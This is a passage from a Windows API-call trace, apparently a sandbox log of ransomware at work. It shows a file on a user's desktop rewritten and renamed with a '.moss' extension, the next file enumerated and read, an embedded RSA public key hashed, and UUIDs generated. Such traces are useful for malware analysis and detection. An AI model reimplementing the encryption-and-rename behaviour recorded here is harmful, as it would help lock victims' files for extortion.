[0170.264] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0170.264] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0170.264] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0170.264] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc2a8 [0170.264] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0170.264] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2e0 [0170.264] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0170.264] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0170.264] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd340 [0170.264] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd350 [0170.264] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd360 [0170.264] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fc2c0 [0170.264] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd350 | out: hHeap=0xcd0000) returned 1 [0170.264] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0170.264] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd340 | out: hHeap=0xcd0000) returned 1 [0170.264] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc290 [0170.264] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd360 | out: hHeap=0xcd0000) returned 1 [0170.264] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbbe8 [0170.264] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0170.264] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd280 [0170.264] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0170.264] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbb70 [0170.265] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0170.265] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc00 [0170.265] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0170.265] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fc2d8 [0170.265] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0170.265] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbb70 [0170.265] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc00 | out: hHeap=0xcd0000) returned 1 [0170.265] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2f0 [0170.265] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0170.265] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a10 [0170.265] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0170.265] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1c) returned 0x3b3c6d8 [0170.265] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc2a8 | out: hHeap=0xcd0000) returned 1 [0170.265] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fc2a8 [0170.265] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0170.265] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x204) returned 0x3b44ac8 [0170.265] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0170.265] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa26a0 [0170.265] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0170.265] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x210) returned 0x3b48820 [0170.265] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0170.265] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10c) returned 0x35f7c30 [0170.265] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0170.265] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa2588 [0170.266] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc2a8 | out: hHeap=0xcd0000) returned 1 [0170.266] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x200) returned 0x3b48a38 [0170.266] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa26a0 | out: hHeap=0xcd0000) returned 1 [0170.266] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xdc53e8 [0170.266] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0170.266] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ebf0 | out: hHeap=0xcd0000) returned 1 [0170.266] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0170.266] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc53e8 | out: hHeap=0xcd0000) returned 1 [0170.266] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a10 | out: hHeap=0xcd0000) returned 1 [0170.266] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2588 | out: hHeap=0xcd0000) returned 1 [0170.266] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0170.266] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48a38 | out: hHeap=0xcd0000) returned 1 [0170.266] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f7c30 | out: hHeap=0xcd0000) returned 1 [0170.266] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0170.266] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc2d8 | out: hHeap=0xcd0000) returned 1 [0170.266] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0170.266] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0170.266] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0170.266] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc2c0 | out: hHeap=0xcd0000) returned 1 [0170.266] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc290 | out: hHeap=0xcd0000) returned 1 [0170.267] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35deb08 | out: hHeap=0xcd0000) returned 1 [0170.267] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0170.267] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0170.267] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc278 | out: hHeap=0xcd0000) returned 1 [0170.267] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4c118 | out: hHeap=0xcd0000) returned 1 [0170.267] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44ac8 | out: hHeap=0xcd0000) returned 1 [0170.267] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0170.267] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cad8 | out: hHeap=0xcd0000) returned 1 [0170.267] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2470 | out: hHeap=0xcd0000) returned 1 [0170.267] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e06d0 | out: hHeap=0xcd0000) returned 1 [0170.267] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0170.267] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0170.267] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36136d0 | out: hHeap=0xcd0000) returned 1 [0170.267] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44498 | out: hHeap=0xcd0000) returned 1 [0170.267] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0170.267] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0170.267] WriteFile (in: hFile=0x664, lpBuffer=0x3b53ea8*, nNumberOfBytesToWrite=0x81e3, lpNumberOfBytesWritten=0x401fb14, lpOverlapped=0x0 | out: lpBuffer=0x3b53ea8*, lpNumberOfBytesWritten=0x401fb14*=0x81e3, lpOverlapped=0x0) returned 1 [0170.267] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b53ea8 | out: hHeap=0xcd0000) returned 1 [0170.267] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x81e8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.268] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0170.268] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44690 | out: hHeap=0xcd0000) returned 1 [0170.268] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0170.268] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x428) returned 0x3b48820 [0170.268] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3b48820, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 41 [0170.268] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x430) returned 0x3b48c50 [0170.268] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0170.268] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0170.268] WriteFile (in: hFile=0x664, lpBuffer=0x3b48c50*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b48c50*, lpNumberOfBytesWritten=0x401fb50*=0x28, lpOverlapped=0x0) returned 1 [0170.268] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48c50 | out: hHeap=0xcd0000) returned 1 [0170.268] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0170.268] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0170.268] CloseHandle (hObject=0x664) returned 1 [0170.270] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x35b7de8 [0170.270] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x890) returned 0x3b4b098 [0170.270] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35b7de8 | out: hHeap=0xcd0000) returned 1 [0170.270] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xxuaxzQ\\Fes_XROkSU6uT2U.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xxuaxzq\\fes_xroksu6ut2u.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xxuaxzQ\\Fes_XROkSU6uT2U.png.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xxuaxzq\\fes_xroksu6ut2u.png.moss")) returned 1 [0170.271] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0170.271] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0170.271] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0170.272] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd80bd8 | out: hHeap=0xcd0000) returned 1 [0170.272] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6afb030, ftCreationTime.dwHighDateTime=0x1d5df07, ftLastAccessTime.dwLowDateTime=0x6bed00e0, ftLastAccessTime.dwHighDateTime=0x1d5de97, ftLastWriteTime.dwLowDateTime=0x6bed00e0, ftLastWriteTime.dwHighDateTime=0x1d5de97, nFileSizeHigh=0x0, nFileSizeLow=0x13460, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="M_TQtkh1FRb6dyX3oc1C.swf", cAlternateFileName="M_TQTK~1.SWF")) returned 1 [0170.272] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0170.272] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0xd80bd8 [0170.272] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0170.272] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xxuaxzQ\\M_TQtkh1FRb6dyX3oc1C.swf") returned=".swf" [0170.272] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xxuaxzQ\\M_TQtkh1FRb6dyX3oc1C.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xxuaxzq\\m_tqtkh1frb6dyx3oc1c.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0170.273] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=78944) returned 1 [0170.273] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0170.277] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x1343a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.277] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0170.279] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0170.279] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0170.279] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.279] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x13460, lpOverlapped=0x0) returned 1 [0170.280] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.280] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0170.280] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.280] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.280] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ebf0) returned 1 [0170.281] CryptCreateHash (in: hProv=0xd2ebf0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0170.281] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0170.281] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0170.281] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0170.281] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0170.281] GetLastError () returned 0x0 [0170.282] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0170.282] CryptReleaseContext (hProv=0xd2ebf0, dwFlags=0x0) returned 1 [0170.282] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0170.282] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0170.282] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0170.282] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0170.282] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0170.282] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0170.282] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0170.282] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x13460) returned 0x3b62d40 [0170.282] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0170.282] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0170.283] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0170.283] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0170.283] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b44498 [0170.283] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0170.283] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b4c118 [0170.283] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc278 [0170.283] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b4c160 [0170.283] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc290 [0170.283] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc2c0 [0170.283] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbbe8 [0170.283] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc2d8 [0170.283] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x24) returned 0x35f9e20 [0170.283] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x158) returned 0x3b51ec0 [0170.283] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0170.283] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0170.283] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc2c0 | out: hHeap=0xcd0000) returned 1 [0170.283] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc2d8 | out: hHeap=0xcd0000) returned 1 [0170.283] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0170.283] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0170.283] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0170.283] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbbe8 [0170.283] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2a0 [0170.283] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fc2d8 [0170.283] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a50 [0170.284] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x35fc2c0 [0170.284] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd320 [0170.284] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0x3b44690 [0170.284] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0170.284] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613610 [0170.284] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0170.284] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa2470 [0170.284] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a70 [0170.284] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0170.284] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44690 | out: hHeap=0xcd0000) returned 1 [0170.284] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc2d8 | out: hHeap=0xcd0000) returned 1 [0170.284] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0170.284] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc2c0 | out: hHeap=0xcd0000) returned 1 [0170.284] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0170.284] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0170.284] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0170.284] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0170.284] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36136d0 | out: hHeap=0xcd0000) returned 1 [0170.284] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5ed58 | out: hHeap=0xcd0000) returned 1 [0170.284] GetCurrentThreadId () returned 0x324 [0170.284] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x3b44690 [0170.284] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0x3b4a100 [0170.284] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0170.284] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ebf0 [0170.284] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0x35deb08 [0170.284] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0170.284] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0170.284] RtlAllocateHeap 